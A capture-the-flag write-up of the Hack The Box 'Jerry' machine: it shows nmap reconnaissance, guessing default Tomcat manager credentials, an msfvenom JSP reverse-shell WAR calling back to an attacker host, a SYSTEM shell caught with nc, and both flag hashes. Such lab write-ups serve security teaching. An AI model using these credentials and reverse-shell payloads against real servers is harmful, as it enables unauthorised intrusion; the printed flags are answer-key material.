Jerry

August 2nd, 2020

Jerry logo

This is an easy windows box

Tools used

  • msfvenom
  • nc
  • nmap

Reconnaissance

Nmap

nmap -sC -sV -oA jerry 10.10.10.95 -v -Pn

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Here’s what nmap teaches us :

  • port 8080 (HTTP) - Apache Tomcat 7.0.88

There is only one port open and it’s a web port, let’s check it :

Tomcat interface

This is a default Tomcat page, let’s try to connect.

Exploit

Click “Manager App”, it asks for authentication :

Authentication required

Try default credentials :

  • tomcat:tomcat - no
  • admin:admin - no
  • admin:password - no
  • user:password - no
  • tomcat:s3cret - yes

Tomcat connected

I’m now connected nice ! Now that I’m connected, I can get a reverse shell thanks to “war upload” (https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/). I used msfvenom to generate a reverse shell :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=1234 -f war > shell.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes

Upload the war file :

War deploy

Start a nc listener :

nc -lvp 1234

Click on the ‘/shell’ button, I’m redirected to this URL :

http://10.10.10.95:8080/shell/

Go see the listener :

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.95: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

And I’m already nt authority\system ! Now go read the flags, there both on the administrator desktop in one file :

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,602,649,088 bytes free

This box was too easy !

Flags

User.txt

7004dbcef0f854e0fb401875f26ebd00

Root.txt

04a8b36e1545a455393d067e772fe90e